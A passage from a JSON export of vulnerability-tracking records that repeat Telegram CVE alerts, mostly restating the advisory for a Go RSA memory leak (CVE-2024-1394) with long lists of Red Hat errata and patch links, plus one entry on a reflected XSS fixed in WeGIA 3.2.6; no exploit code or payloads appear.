https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "6f2b0e66-bd57-485c-af6b-f73144dbc699", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4591", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "df365af9-49cf-464f-bb95-94e2eaa03033", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6Q73-74PC-P3C8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1382", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22615\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `Cadastro_Atendido.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `cpf` parameter. The application fails to validate and sanitize user inputs in the `cpf` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T20:57:09.695Z\n\ud83d\udccf Modified: 2025-01-13T20:57:09.695Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6q73-74pc-p3c8\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/61ae1c3bec3c76e039f5ef48bc46cea30562192e", "creation_timestamp": "2025-01-13T21:11:27.000000Z"}, {"uuid": "92527766-c5ab-47d8-bf3a-5a6e5842635d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1563", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "0ecb8633-8a3d-410d-ac97-1cd9a661009b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4371", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "e53bf06c-531d-4834-bd2e-6317e884e3ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2730", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "e505a5c6-5406-4836-af1b-7944ed1b9e55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7262", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "03de8746-da49-4a40-a953-b25c97483afc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4762", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "22aa6edd-51c8-4817-a7ac-c0cd288bf1a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1644", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. 